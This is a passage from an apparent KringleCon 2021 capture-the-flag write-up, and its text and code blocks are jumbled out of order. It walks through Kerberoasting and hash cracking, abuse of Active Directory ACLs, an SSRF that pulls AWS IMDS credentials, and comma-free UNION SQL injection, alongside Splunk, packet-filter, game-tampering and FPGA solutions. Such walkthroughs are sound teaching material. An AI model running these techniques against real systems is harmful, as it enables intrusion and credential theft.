10.128.2.0 172.17.0.1 255.255.255.0 UG 0 0 0 eth0
10.128.3.0 172.17.0.1 255.255.255.0 UG 0 0 0 eth0
172.17.0.0 0.0.0.0 255.255.0.0 U 0 0 0 eth0
# Nmap 7.80 scan initiated Wed Jan 5 14:19:30 2022 as: nmap -Pn --open --script=smb-enum-shares -p 445 -
T 5 -oN report.txt --open 172.17.0.0/16
172.17.0.3
Shares:
IPC$
ElfUFiles
172.17.0.4
Shares:
IPC$
elfu_svc_shr
netlogon
sysvol
research_dep
10.128.3.30
Shares:
IPC$
elfu_svc_shr
netlogon
sysvol
research_dep
# Nmap 7.80 scan initiated Wed Jan 5 02:05:53 2022 as: nmap -Pn -p 389 -T 5 -oN report.txt --open
172.17.0.0/16 10.128.1.0/24 10.128.2.0/24
HOsts of interest
172.17.0.4
10.128.3.30
10.128.1.53

Next, we can attempt to get Kerberos tickets for accounts with SPNs set. After copying the GetUserSPNs.py script to
the system, we run it against the most likely domain controllers, 10.128.1.53 and 10.128.3.30.
We now have a password that we can try to crack. Let’s use cewl to get all the words on register.elfu.org/register with
the following command.
Now lets try to crack our SPNs password using hydra.
iagsdckwxy@grades:~$ python3 GetUserSPNs.py -outputfile spns.txt -dc-ip 10.128.1.53
elfu.local/iagsdckwxy:'Djxfimuhm@' -request
Impacket v0.9.24 - Copyright 2021 SecureAuth Corporation
ServicePrincipalName Name MemberOf PasswordLastSet LastLogon
Delegation
----------------------------------- -------- -------- --------------------------
-------------------------- ----------
ldap/elfu_svc/elfu elfu_svc 2021-10-29 19:25:04.305279 2022-01-05
14:42:40.370050
ldap/elfu_svc/elfu.local elfu_svc 2021-10-29 19:25:04.305279 2022-01-05
14:42:40.370050
ldap/elfu_svc.elfu.local/elfu elfu_svc 2021-10-29 19:25:04.305279 2022-01-05
14:42:40.370050
ldap/elfu_svc.elfu.local/elfu.local elfu_svc 2021-10-29 19:25:04.305279 2022-01-05
14:42:40.370050
iagsdckwxy@grades:~$ cat spns.txt
$krb5tgs$23$*elfu_svc$ELFU.LOCAL$elfu.local/elfu_svc*$f4f52dcd49f6e127fb8166cbb55a8c1b$71b9...
iagsdckwxy@grades:~$
linuxace@kalioscp:~$ cewl –with-numbers -d 2 https://register.elfu.org/register -w elfu.txt
CeWL 5.4.8 (Inclusion) Robin Wood (robin@digi.ninja/)
linuxace@kalioscp:~$ cat elfu.txt
the
domain
and
Elf
University
Student
Registration
ElfU
linuxace@kalioscp:~$ hashcat -m 13100 --rules OneRuleToRuleThemAll.rule --force elfu.hash elfu.txt
hashcat (v6.1.1) starting…
…
$krb5tgs$23$*elfu_svc$ELFU.LOCAL$elfu.local/elfu_svc*$f4f52dcd49f6e127fb8166cbb55a8c1b$71...:Snow2021!
Session..........: hashcat
Status...........: Cracked
Hash.Name........: Kerberos 5, etype 23, TGS-REP
Hash.Target......: $krb5tgs$23$*elfu_svc$ELFU.LOCAL$elfu.local/elfu_sv...fd3ade
Time.Started.....: Wed Jan 5 10:09:30 2022, (18 secs)
Time.Estimated...: Wed Jan 5 10:09:48 2022, (0 secs)
Guess.Base.......: File (elfu.txt)
Guess.Mod........: Rules (OneRuleToRuleThemAll.rule)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 169.5 kH/s (3.36ms) @ Accel:4 Loops:8 Thr:64 Vec:4
Recovered........: 1/1 (100.00%) Digests
Progress.........: 3134208/4003615 (78.28%)
Rejected.........: 0/3134208 (0.00%)
Restore.Point....: 0/77 (0.00%)
Restore.Sub.#1...: Salt:0 Amplifier:40696-40704 Iteration:0-8
Candidates.#1....: He -> cimes

We now have a password for the elfu_svc account. Let’s see if we can access some previously inaccessible network
shares with the password. The elfu_svc_shr is a good candidate due to naming conventions.
Examining these files, we find that there is a large collection of powershell scripts, we can grep through the files for
stored password. After examining the files for the word passwords and doing some Googling on some of the different
characteristics for the Powershell files, we find the following in the GetProcessInfo.ps1:
It appears that this script has everything we need to access the domain controller with the remote_elf user:
At this point we probably need to find a way to add ourselves to the correct group to get access to the right group.
After investigating many of the groups and permissions using ADSI and other builtin tools, we find the remote_elf
user has write permissions to the Research Department group.
iagsdckwxy@grades:~$ smbclient //10.128.3.30/elfu_svc_shr -U elfu_svc
Enter WORKGROUPelfu_svc's password:
Try "help" to get a list of possible commands.
smb: > ls
. D 0 Thu Dec 2 16:39:42 2021
.. D 0 Wed Jan 5 08:01:27 2022
Get-NavArtifactUrl.ps1 N 2018 Wed Oct 27 19:12:43 2021
Get-WorkingDirectory.ps1 N 188 Wed Oct 27 19:12:43 2021
Stop-EtwTraceCapture.ps1 N 924 Wed Oct 27 19:12:43 2021
…
smb: > prompt
smb: > mget *
getting file Get-NavArtifactUrl.ps1 of size 2018 as Get-NavArtifactUrl.ps1 (1970.5 KiloBytes/sec)
(average 1970.7 KiloBytes/sec)
getting file Get-WorkingDirectory.ps1 of size 188 as Get-WorkingDirectory.ps1 (183.6 KiloBytes/sec)
(average 1077.1 KiloBytes/sec)
iagsdckwxy@grades:~/ps$ cat GetProcessInfo.ps1
$SecStringPassword =
"76492d1116743f0423413b16050a5345MgB8AGcAcQBmAEIAMgBiAHUAMwA5AGIAbQBuAGwAdQAwAEIATgAwAEoAWQBuAGcAPQA9AHwA
NgA5ADgAMQA1ADIANABmAGIAMAA1AGQAOQA0AGMANQBlADYAZAA2ADEAMgA3AGIANwAxAGUAZgA2AGYAOQBiAGYAMwBjADEAYwA5AGQAN
ABlAGMAZAA1ADUAZAAxADUANwAxADMAYwA0ADUAMwAwAGQANQA5ADEAYQBlADYAZAAzADUAMAA3AGIAYwA2AGEANQAxADAAZAA2ADcANw
BlAGUAZQBlADcAMABjAGUANQAxADEANgA5ADQANwA2AGEA"
$aPass = $SecStringPassword | ConvertTo-SecureString -Key 2,3,1,6,2,8,9,9,4,3,4,5,6,8,7,7
$aCred = New-Object System.Management.Automation.PSCredential -ArgumentList ("elfu.localremote_elf",
$aPass)
Invoke-Command -ComputerName 10.128.1.53 -ScriptBlock { Get-Process } -Credential $aCred -Authentication
Negotiate
PS /home/iagsdckwxy/ps> $SecStringPassword =
"76492d1116743f0423413b16050a5345MgB8AGcAcQBmAEIAMgBiAHUAMwA5AGIAbQBuAGwAdQAwAEIATgAwAEoAWQBuAGcAPQA9AHwA
NgA5ADgAMQA1ADIANABmAGIAMAA1AGQAOQA0AGMANQBlADYAZAA2ADEAMgA3AGIANwAxAGUAZgA2AGYAOQBiAGYAMwBjADEAYwA5AGQAN
ABlAG
>>
MAZAA1ADUAZAAxADUANwAxADMAYwA0ADUAMwAwAGQANQA5ADEAYQBlADYAZAAzADUAMAA3AGIAYwA2AGEANQAxADAAZAA2ADcANwBlAGU
AZQBlADcAMABjAGUANQAxADEANgA5ADQANwA2AGEA"
PS /home/iagsdckwxy/ps> $aPass = $SecStringPassword | ConvertTo-SecureString -Key
2,3,1,6,2,8,9,9,4,3,4,5,6,8,7,7
PS /home/iagsdckwxy/ps> $aCred = New-Object System.Management.Automation.PSCredential -ArgumentList
("elfu.localremote_elf", $aPass)
PS /home/iagsdckwxy/ps> Enter-PSSession -ComputerName 10.128.1.53 -Credential $aCred
[10.128.1.53]: PS C:Usersremote_elfDocuments>

Now we can run the following scripts to grant ourselves access to the Research Department group and thereby give
ourselves access to the research_dep share on the command line using two other scripts provided in the hints.
After a few minutes we are able to access the research_dep share using are original unprivileged user name.
We can Base64 this PDF file and copy it to our own system for viewing:
$ADSI = [ADSI]"LDAP://CN=Research Department,CN=Users,DC=elfu,DC=local"
$ADSI.psbase.ObjectSecurity.GetAccessRules($true,$true,[Security.Principal.NTAccount])
...
ActiveDirectoryRights : WriteDacl
InheritanceType : None
ObjectType : 00000000-0000-0000-0000-000000000000
InheritedObjectType : 00000000-0000-0000-0000-000000000000
ObjectFlags : None
AccessControlType : Allow
IdentityReference : ELFUremote_elf
IsInherited : False
InheritanceFlags : None
PropagationFlags : None
...
[10.128.1.53]: PS C:Usersremote_elfDocuments> Add-Type -AssemblyName
System.DirectoryServices
[10.128.1.53]: PS C:Usersremote_elfDocuments> $ldapConnString = "LDAP://CN=Research
Department,CN=Users,DC=elfu,DC=local"
[10.128.1.53]: PS C:Usersremote_elfDocuments> $username = "iagsdckwxy"
[10.128.1.53]: PS C:Usersremote_elfDocuments> $password = "Djxfimuhm@"
[10.128.1.53]: PS C:Usersremote_elfDocuments> $domainDirEntry = New-Object
System.DirectoryServices.DirectoryEntry $ldapConnString, $username, $password
[10.128.1.53]: PS C:Usersremote_elfDocuments> $user = New-Object
System.Security.Principal.NTAccount("elfu.local$username")
$sid=$user.Translate([System.Security.Principal.SecurityIdentifier])
[10.128.1.53]: PS C:Usersremote_elfDocuments> $b=New-Object byte[] $sid.BinaryLength
[10.128.1.53]: PS C:Usersremote_elfDocuments> $sid.GetBinaryForm($b,0)
$hexSID=[BitConverter]::ToString($b).Replace('-','')
[10.128.1.53]: PS C:Usersremote_elfDocuments> $domainDirEntry.Add("LDAP://<SID=$hexSID>")
[10.128.1.53]: PS C:Usersremote_elfDocuments> $domainDirEntry.CommitChanges()
[10.128.1.53]: PS C:Usersremote_elfDocuments> $domainDirEntry.dispose()
iagsdckwxy@grades:~/ps$ smbclient //10.128.3.30/research_dep -U iagsdckwxy
Enter WORKGROUPiagsdckwxy's password:
Try "help" to get a list of possible commands.
smb: > ls
. D 0 Thu Dec 2 16:39:42 2021
.. D 0 Wed Jan 5 08:01:27 2022
SantaSecretToAWonderfulHolidaySeason.pdf N 173932 Thu Dec 2 16:38:26 2021
41089256 blocks of size 1024. 34346872 blocks available
smb: > get SantaSecretToAWonderfulHolidaySeason.pdf
getting file SantaSecretToAWonderfulHolidaySeason.pdf of size 173932 as
SantaSecretToAWonderfulHolidaySeason.pdf (56616.6 KiloBytes/sec) (average 56618.5 KiloBytes/sec)
smb: >
10.128.1.53]: PS C:Usersremote_elfDocuments> Add-Type -AssemblyName System.DirectoryServices
[10.128.1.53]: PS C:Usersremote_elfDocuments> $ldapConnString = "LDAP://CN=Research
Department,CN=Users,DC=elfu,DC=local"
[10.128.1.53]: PS C:Usersremote_elfDocuments> $username = "iagsdckwxy"
[10.128.1.53]: PS C:Usersremote_elfDocuments> $nullGUID = [guid]'00000000-0000-0000-0000-000000000000'
[10.128.1.53]: PS C:Usersremote_elfDocuments> $propGUID = [guid]'00000000-0000-0000-0000-000000000000'
[10.128.1.53]: PS C:Usersremote_elfDocuments> $IdentityReference = (New-Object
System.Security.Principal.NTAccount("elfu.local
$username")).Translate([System.Security.Principal.SecurityIdentifier])
[10.128.1.53]: PS C:Usersremote_elfDocuments> $inheritanceType =
[System.DirectoryServices.ActiveDirectorySecurityInheritance]::None
[10.128.1.53]: PS C:Usersremote_elfDocuments> $ACE = New-Object
System.DirectoryServices.ActiveDirectoryAccessRule $IdentityReference,
([System.DirectoryServices.ActiveDirectoryRights] "GenericAll"),
([System.Security.AccessControl.AccessControlType] "Allow"), $propGUID, $inheritanceType, $nullGUID
[10.128.1.53]: PS C:Usersremote_elfDocuments> $domainDirEntry = New-Object
System.DirectoryServices.DirectoryEntry $ldapConnString
[10.128.1.53]: PS C:Usersremote_elfDocuments> $secOptions = $domainDirEntry.get_Options()
[10.128.1.53]: PS C:Usersremote_elfDocuments> $secOptions.SecurityMasks =
[System.DirectoryServices.SecurityMasks]::Dacl
[10.128.1.53]: PS C:Usersremote_elfDocuments> $domainDirEntry.RefreshCache()
[10.128.1.53]: PS C:Usersremote_elfDocuments> $domainDirEntry.get_ObjectSecurity().AddAccessRule($ACE)
[10.128.1.53]: PS C:Usersremote_elfDocuments> $domainDirEntry.CommitChanges()
[10.128.1.53]: PS C:Usersremote_elfDocuments> $domainDirEntry.dispose()

Now we can read the PDF and answer the question for the objective on the badge with the answer, kindness.
After entering the answer, kindness into the badge, we complete the objective and earn the Kerberoasting on an Open
Fire achievement.
2.9 Objective 9 – Splunk!
Objective 9 is located in the Great Room.
The following hints are given by Fizzy Shortstack after solving the Yara Analysis terminal.
• GitHub Monitoring in Splunk – Between GitHub audit log and webhook event recording, you can monitor
all activity in a repository, including common git commands such as git add, git status, and git commit.
• Sysmon Monitoring in Splunk – Sysmon network events don’t reveal the process parent ID for example.
Fortunately, we can pivot with a query to investigate process creation events once you get a process ID.
• Malicious NetCat?? - Did you know there are multiple version of the Netcat command that can be used
maliciously? nc.openbsd, for example.
Below are the questions, the SPL to answer the question and the answer.
1. Capture the commands Eddie ran most often, starting with git. Looking only at his process launches as reported by
Sysmon, record the most common git-related CommandLine that Eddie seems to use.
Answer: git status
2. Looking through the git commands Eddie ran, determine the remote repository that he configured as the origin for
the ‘partnerapi’ repo. The correct one!
Answer: git@github.com:elfnp3/partnerapi.git
agsdckwxy@grades:~$ cat SantaSecretToAWonderfulHolidaySeason.pdf | base64 | tr -d 'n'
JVBERi0xLjMKJcTl8uXrp/Og0MTGCjMgMCBvYmoKPDwgL0ZpbHRlciAvRmxhdGVEZWNvZGUgL0xlbmd0aCA0OTc5ID4+CnN0c...
...
linuxace@kalioscp:~$ echo Og0MTGCjMgMCBvYmoKPDwgL0ZpbHRlciAvRmxhdGVEZWNvZGUgL0xlbmd0aCA0OTc5ID4+CnN0c...
| base64 -d > Santa.pdf
index=main git | stats count by CommandLine | sort - count
index=main git partnerapi origin | where isnotnull(CommandLine) | table CommandLine

3. Eddie was running Docker on his workstation. Gather the full command line that Eddie used to bring up the
partnerapi project on his workstation.
Answer: docker compose up
4. Eddie has been testing automated static application security testing (SAST) in GitHub. Vulnerability reports have
been coming into Splunk in JSON format via GitHub webhooks. Search all the events in the main index in Splunk
and use the sourcetype field to locate these reports. Determine the URL of the vulnerable GitHub repository that the
elves cloned for testing and document it here. You will need to search outside of Splunk (try GitHub) for the original
name of the repository.
https://www.google.com/search?q=dvws-node+github&oq=dvws-node+github
Answer: https://github.com/snoopysecurity/dvws-node
5. Santa asked Eddie to add a JavaScript library from NPM to the ‘partnerapi’ project. Determine the name of the
library and record it here for our workshop documentation.
Answer: holiday-utils-js
6. Another elf started gathering a baseline of the network activity that Eddie generated. Start with their search and
capture the full process_name field of anything that looks suspicious.
Answer: /usr/bin/nc.openbsd
7. Uh oh. This documentation exercise just turned into an investigation. Starting with the process identified in the
previous task, look for additional suspicious commands launched by the same parent process. One thing to know
about these Sysmon events is that Network connection events don’t indicate the parent process ID, but Process
creation events do! Determine the number of files that were accessed by a related process and record it here:
Answer: 6
8. Use Splunk and Sysmon Process creation data to indentify the name of the Bash script that accessed sensitive files
and (likely) transmitted them to a remote IP address.
Answer: preinstall.sh
index=main docker CommandLine=* NOT iptables NOT untar NOT proxy NOT entrypoint NOT libnetwork NOT runc
NOT ps NOT init NOT ipv6 NOT resolver NOT git| table CommandLine | stats count by CommandLine
index=main sourcetype=ghe_audit_log_monitoring | stats count by repo
index=main partnerapi npm | table CommandLine
index=main sourcetype=journald source=Journald:Microsoft-Windows-Sysmon/Operational EventCode=3
user=eddie NOT dest_ip IN (127.0.0.*) NOT dest_port IN (22,53,80,443)
| stats count by Image
index=main /usr/bin/nc.openbsd | table ParentProcessId = 6788
then
index=main ParentProcessId=6788 | rex field=CommandLine "cats(?<directory>/.*s)" | eval
directories=split(directory, " ") | stats count(directories) by CommandLine = 6
index=main sourcetype=journald source=Journald:Microsoft-Windows-Sysmon/Operational EventCode=3
user=eddie NOT dest_ip IN (127.0.0.*) NOT dest_port IN (22,53,80,443)
| stats count by Image

After completing task 8, we receive a pop-up that gives us the answer we need to enter on our badge to solve the
objective.
After entering the word whiz into the Objective 9 text box we complete the objective and earn the Splunk!
achievement.
2.10 Objective 10 – Now Hiring!
For this challenge you need to find a SSRF vulnerability that you can use to find a AWS secret access key.
The following hints are given to help solve this objective by Noxious O Dior after slaving the IMDS terminal:
• AWS IMDS Documentation – The AWS documentation for IMDS is interesting reading.
Browsing the website we find that the Career Application has a field for a URL to your public NLBI report. This
looks like an ideal place for an SSRF. Let’s check this with curl after playing with developer tools to see what is
submitted and findings that we get a strange image after submitting a valid IMDS url for the NLBI report.
Note that the image name is the inputName concatenated with .jpg and that this link provides us the result of our
IMDS query. We can use this to try and find a IAM role that has security credentials.
linuxace@kalioscp:~$ curl 'https://apply.jackfrosttower.com/?
inputName=test&inputEmail=test@test.com&inputPhone=test&inputField=Anti-
social+behavior&resumeFile=&inputWorkSample=http://169.254.169.254/
latest&additionalInformation=test&submit='
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8">
...
linuxace@kalioscp:~$ curl https://apply.jackfrosttower.com/images/test.jpg
dynamic
meta-data

Now we can retrieve the credentials using one final query.
Inputting the SecretAccessKey value found from this query solves the objective and you are awarded the SSRF to
IMDS to S3 Bucket Access achievement.
2.11 Objective 11 – Customer Complaint Analysis
This objective requires us to search a PCAP file for information for HTTP requests that help us answer our question.
Tinsel Upatree in the kitchen gives us some hints if we solve the strace-ltrace-retrace terminal.
The following hints are given for this objective after solving the associated terminal:
• Evil Bit RFC – RFC3513 defines the usage of the “Evil Bit” in IPv4 headers.
• Wireshark Display Filters – Different from BPF capture filters, Wireshark’s display filters can find text with
the contains keyword – and evil bits with ip.flag.rb.
linuxace@kalioscp:~$ curl 'https://apply.jackfrosttower.com/?
social+behavior&resumeFile=&inputWorkSample=http://169.254.169.254/latest/meta-data/iam/security-
credentials&additionalInformation=test&submit='
<!DOCTYPE html>
<html lang="en">
<head>
...
jf-deploy-role
linuxace@kalioscp:~$ curl https://apply.jackfrosttower.com/?
social+behavior&resumeFile=&inputWorkSample=http://169.254.169.254/latest/meta-data/iam/security-
credentials/jf-deploy-role&additionalInformation=test&submit='
<!DOCTYPE html>
<html lang="en">
<head>
...
{
"Code": "Success",
"LastUpdated": "2021-05-02T18:50:40Z",
"Type": "AWS-HMAC",
"AccessKeyId": "AKIA5HMBSK1SYXYTOXX6",
"SecretAccessKey": "CGgQcSdERePvGgr058r3PObPq3+0CfraKcsLREpX",
"Token": "NR9Sz/7fzxwIgv7URgHRAckJK0JKbXoNBcy032XeVPqP8/tWiR/KVSdK8FTPfZWbxQ==",
"Expiration": "2026-05-02T18:50:40Z"
}

After looking over the PCAP, we find that complaints are submitted using HTTP to
frost-tower.local/feedback/guest_complaints. If we use the following filter, looking for POSTs to the complaint
website without the “Evil Bit” set, we find information for the human who filed a complaint and accessed the JF
Tower network with a non-compliant host:
We find the following attributes:
• Name: “Muffy VonDuchess Sebastian”
• Guest Info: Room 1024
• Troll ID: “ I don’t know. There were several of them”
• Description: “I have never, in my life, been in a facility with such horrible staff. They are rude and insulting.
What kind of place is this? You can be sure that I (or my lawyer) will be speaking directly with Mr. Frost!”
With this information we can modify our search to turn on the “Evil Bit” in the filter and look for complaints
associated with Room 1024 as room numbers are often included in the guest_info form field.
This gives us answer of Flud, Hagg, and Yaqh. Typing this answer into the textbox on our badge under Objective 11
earns us the Reading Evil Packets achievement.
2.12 Objective 12 – Frost Tower Website Checkup
This objective is the first of the final two objectives. It requires using source code to bypass authentication of a
website and them to use SQL injection to retrieve data from a table. Ribb Bonbowford, in Santa’s dining room will
offer some hints after solving The Elf Code game terminal.
We are given the following hint to help us with our task.
• SQL Injection with Source – When you have the source code, API documentation becomes tremendously
valuable.
After looking over the API documents, the first issue we find is an OWASP Top 10 vulnerability with Broken
Authentication/Identification and Authentication Failures. We can see a logic flaw in the code below, which assigns a
session token if the user puts an existing email in the contact form.
ip.flags.rb==0 && http contains complaint && http.request.method==POST
ip.flags.rb==1 && http contains complaint && http.request.method==POST && urlencoded-form.value contains
"1024"
var rowlength = rows.length;
if (rowlength >= "1"){
session = req.session;
session.uniqueID = email;
req.flash('info', 'Email Already Exists');
res.redirect("/contact");
}

This means we can access the dashboard where we can search data after we enter an email address that already exists
in the contact form without having to authenticate and also access account details. This is important because,
examining the source code, we find a flaw in the detail logic, which allows unfiltered SQL code to be accepted
directly from the user and is appended to the query as text and not as a parameterized query in the /detail/:id endpoint.
This flaw means that we can inject code in the URL, but there is a catch as, because of the split(‘,’) function we will
not be able to use commas.
We also know that we are using MySQL due to the review of the source code and API docs. Let’s build a union select
SQL injection to see how many columns we need.
We get an error when we get to 8, so we have seven columns to work with. Not all of them are probably shown in the
interface. Let’s now build a select union query selecting only NULLs so we know it is working.
We get the following result:
Now that we have a working query we can start browsing the database to find the data we need to view. We will list
all the schemas, then list all tables in the correct schema, then all the columns in the correct table, then view the
appropriate columns in the correct table. Note that some of this information is available in the source code as well.
Schemas/Databases:
Results
if (reqparam.indexOf(',') > 0){
var ids = reqparam.split(',');
reqparam = "0";
for (var i=0; i<ids.length; i++){
query += tempCont.escape(m.raw(ids[i]));
query += " OR id="
}
query += "?";
}else{
query = "SELECT * FROM uniquecontact WHERE id=?"
}
https://staging.jackfrosttower.com/detail/13,14 order by 8 --
https://staging.jackfrosttower.com/detail/13,14 union select * from (select NULL)a join (select NULL)b
join (select NULL)c join (select NULL)d join (select NULL)e join (select NULL)f join (select NULL)g --
s
email@email.com
123456
-Select-
January 6th, 2022 11:34:23
January 6th, 2022 6:21:10
abc
abc@abc.com
123
Algeria
January 6th, 2022 1:02:48
January 6th, 2022 6:21:10
January 6th
, 2022 6:21:10
January 6th
, 2022 6:21:10
join (select schema_name from information_schema.schemata)c join (select NULL)d join (select NULL)e join
(select NULL)f join (select NULL)g --

• information_schema
• encontact
Tables in Encontact Databases
Results
• users
• todo
• emails
• uniquecontact
Columns in Todo Table
Results
• id
• note
• completed
Get Notes from ToDo Table
Results
• Buy up land all around Santa’s Castle
• Build bigger and more majestic tower next to Santa’s
• Erode Santa’s influence at the North Pole via FrostFest, the greatest Con in history
• Dishearten Santa’s elves and encourage defection to our cause
• Steal Santa’s sleigh technology and build a competing and way better Frosty present delivery vehicle
• Undermine Santa’s ability to deliver presents on 12/24 through elf staff shortages, technology glitches, and
assorted mayhem
• Force Santa to cancel Christmas
• SAVE THE DAY by delivering Frosty presents using merch from the Frost Tower Gift Shop to children
world-wide...so the whole world sees that Frost saved the Holiday Season!!!! Bwahahahahaha!
• With Santa defeated, offer the old man a job as a clerk in the Frost Tower Gift Shop so we can keep an eye on
him
After retrieving this data, we have the answer we need. Entering the word clerk into the badge under Objective 12
completes the challenge and gives us the Frost Tower Website Checkup achievement.
2.13 Objective 13 – FPGA Programming
In this final challenge, we are tasked with developing a Verilog program to output certain frequency sounds as a
square wave.
join (select table_name from information_schema.tables where table_schema = "encontact")c join (select
NULL)d join (select NULL)e join (select NULL)f join (select NULL)g --
join (select column_name from information_schema.columns where table_name = "todo")c join (select NULL)d
join (select NULL)e join (select NULL)f join (select NULL)g --
join (select note from encontact.todo)c join (select NULL)d join (select NULL)e join (select NULL)f join
(select NULL)g --

We are given the following hints to help us along the way by Grody Goiterson:
• FPGA Talk - Prof. Qwerty Petabyte is giving a lesson about Field Programmable Gate Arrays (FPGAs).
• FPGA for Fun – There are FPGA enthusiast sites.
The following code solves this challenge for all required frequencies. One hint that should have been given is that if
you have a reset, you need to take into account the leading edge of the wave and start the count at one less than if you
are counting up without a reset.
After finishing the code and successfully running through all the tests, you can press the Program Device button to
finish the final objective of Kringlecon 2021. You are awarded the FPGA Programming achievement and are given a
FPGA which allows you to finish the game/narrative.
2.14 End Game
After finishing the last objective, you are given an FPGA. You can use this to plug into the Speak & Spell on the table
near Crunchy Squisher into the device she is building on the rooftop of Jack Frost Tower. When the FPGA is plugged
in, music plays and spaceship descends and your are awarded the Open the Spaceship’s Door achievement. You can
module tone_generator (
input clk,
input rst,
input [31:0] freq,
output wave_out
);
reg [31:0] counter;
reg [31:0] top;
reg tone;
real limit = 125000000.0/(freq*2/100); // get a real number with the correct endpoint for loop
assign wave_out = tone;
always @(posedge clk or posedge rst)
begin
counter<= 0;
if(rst==1)
begin
counter <= -1; // take into account the leading edge on reset
tone <=0;
end
else
if($rtoi(limit * 10) - ($rtoi(limit) * 10) > 4) // round real to integer correctly
top <= $rtoi(limit) + 1;
else
top <= $rtoi(limit);
begin
if(counter >= top)
begin
counter <= 1;
tone <= tone ^ 1'b1; // toggle tone between 1 and 0
end
else
counter <= counter + 1; // increment counter every n clock cycles
end
end
endmodule

enter the spaceship and explore the dialog options of the characters from right to left. When you finish the dialog with
Santa you are awarded the You Won! achievement and the credits roll.
3 Terminals
3.1 Exif Metadata
Talking to Piney Sappington and opening the terminal, we find that we need to use the exiftool to find out which of a
number of Word .docx files has been modified.
Using a man page reference to the exiftool and looking at a handful of documents in the directory, there is a good
possibility that we will find our answer in the Last Modified By metadata tag. We can show this tag for all documents
at once by running, exiftool -LastModifiedBy *.
Entering 2021-12-21.docx into the Filename (including .docx extension) > will solve the terminal and give us the
Document Analysis achievement. It also allows us to unlock the three hints used for Objective 2 Where in the World
is Carmel Santiago?
3.2 Grepping for Gold
This challenge requires you to answer a number of question by searching a grepable nmap file with grep. The
following hints are given by Greasy GopherGuts if you talk to him prior to completing the challenge:
• Grep Cheat Sheet – Check this out if you need a grep refresher.
1. What port does 34.76.1.22 have open?
Answer: Port 62078
elf@04b8e74236db:~$ exiftool -LastModifiedBy *
…
======= 2021-12-20.docx
Last Modified By : Santa Claus
======= 2021-12-21.docx
Last Modified By : Jack Frost
======= 2021-12-22.docx
Last Modified By : Santa Claus
…
25 image files read
elf@04b8e74236db:~$
HELP! That wily Jack Frost modified one of our naughty/nice records, and right
before Christmas! Can you help us figure out which one? We’ve installed exiftool
for your convenience!
Filename (including .docx extension) >
Howdy howdy! Mind helping me with this homew- er, challenge?
Someone ran nmap -oG on a big network and produced this bigscan.gnmap file.
The quizme program has the questions and hints and, incidentally,
has NOTHING to do with an Elf University assignment. Thanks!
Answer all the questions in the quizme executable:
- What port does 34.76.1.22 have open?
- What port does 34.77.207.226 have open?
- How many hosts appear "Up" in the scan?
- How many hosts have a web port open? (Let's just use TCP ports 80, 443, and 8080)
- How many hosts with status Up have no (detected) open TCP ports?
- What's the greatest number of TCP ports any one host has open?
Check out bigscan.gnmap and type quizme to answer each question.

2. What port does 34.77.207.226 have open?
Answer: Port 8080
3. How many hosts appear “Up” in the scan?
Answer: 26054
4. How many hosts have a web port open? (Let’s just use TCP ports 80, 443, and 8080)
Answer: 14372
5. How many hosts with status Up have no (detected) open TCP ports?
Answer: 402
6. What’s the greatest number of TCP ports any one host has open?
Answer: 12
After answering all the questions correctly, you earn the Grepping for Gold! achievement and hints for Objective 3
from Greasy GopherGuts.
3.3 Logic Munchers
There are two ways to solve this game and Noel Boetie gives us the following hints:
• Boolean Logic – There are lots of special symbols for logic and set notation. This one covers AND, NOT,
and OR at the bottom.
• AND, OR, NOT, XOR – This might be a handy reference too.
You can either play the game and complete an Intermediate stage in Porpourri or higher or you can tweak the
Javascript code of the game to automatically win each game. There are a few ways to do this. First, we can change
the code in the Chompy.js so we don’t lose lives if we eat the wrong.
Under the class chompy, we can change the die() function to add a life instead of remove one when we die or eat a
false expression.
0b69e686d:~$ grep 34.76.1.22 bigscan.gnmap
Host: 34.76.1.22 () Status: Up
Host: 34.76.1.22 () Ports: 62078/open/tcp//iphone-sync/// Ignored State: closed (999)
elf@3b10b69e686d:~$ grep 34.77.207.226 bigscan.gnmap
Host: 34.77.207.226 () Status: Up
Host: 34.77.207.226 () Ports: 8080/open/tcp//http-proxy/// Ignored State: filtered (999)
elf@3b10b69e686d:~$ grep Up bigscan.gnmap | cut -f 2 -d ' ' | sort | uniq | wc -l
26054
elf@3b10b69e686d:~$ grep -E 's80/open|s443/open|s8080/open' bigscan.gnmap | wc -l
14372
elf@23d6ee396138:~$ expr `echo $(grep Up bigscan.gnmap | wc -l) - $(grep Ports: bigscan.gnmap | wc -l)`
402
elf@23d6ee396138:~$ grep -o -E 'Ports:.*///s' bigscan.gnmap | grep -o -n 'open' | uniq -c | sort |
tail -1
12 5886:open

This change allow us to quickly pass each level by eating any expression until all the true expression are removed.
We can also set the sleep time to be 0 so we don’t have to wait two seconds between each death. The easiest way to
beat this challenge is to change the logic of the function that checks to see if a stage has any remaining true
statements. We can do this by changing the if (!workToDo) to if (workToDo). Upon saving this change in Chrome
Developer Tools, each stage will be automatically won immdeiately upon entering.
Due to the number of expressions, winning the game legitimately will not be covered in this assessment, but for those
unfamiliar with these types of boolean expressions, the game should be played and not circumvented. The
achievement Logic Munchers is awarded for completing this terminal and Noel Boetie gives you hints for Objective 4.
3.4 IPv6 Sandbox
The objective of this challenge is to find the password for a candy striper. The candy striper is on a system on a IPv6
network and it is running a web service on it that has the password. We must use commands such as netcat, nmap,
ping, and curl to find the correct IP address and obtain the password. Jewel Loggins gives us a single hint for this
challenge.
• IPv6 Reference – Check out this Github Gist with common tools used in an IPv6 context
The first thing we will do is to find other link local addresses for computers in our network segment. We can do this
using the following command.
...
die() { // when a player eats the wrong thing or gets eaten
lives += 1; //reduce life count (increase life count)
...
chompySleepTime = new Date().getTime() + 0 // set wake time 2 sec in future
...
...
function checkWin() // check to see if the stage has been won
...
if (workToDo) // work’s all done? Stage up!
...
Tools:
* netcat
* nmap
* ping / ping6
* curl
Welcome, Kringlecon attendee! The candy striper is running as a service on
this terminal, but I can’t remember the password. Like a sticky note under the
keyboard, I put the password on another machine in this network. Problem is: I
don’t have have the IP address of that other host.
Please do what you can to help me out. Find the other machine, retrieve the
Password, and enter it into the Candy Striper in the pane above. I know you
Can get it running again!
elf@9e1d8554e176:~$ ping6 -c2 ff02::1
PING ff02::1(ff02::1) 56 data bytes
64 bytes from fe80::42:c0ff:fea8:a003%eth0: icmp_seq=1 ttl=64 time=0.035 ms
64 bytes from fe80::42:d7ff:fe9d:1bd%eth0: icmp_seq=1 ttl=64 time=0.035 ms (DUP!)
64 bytes from fe80::42:c0ff:fea8:a002%eth0: icmp_seq=1 ttl=64 time=0.035 ms (DUP!)
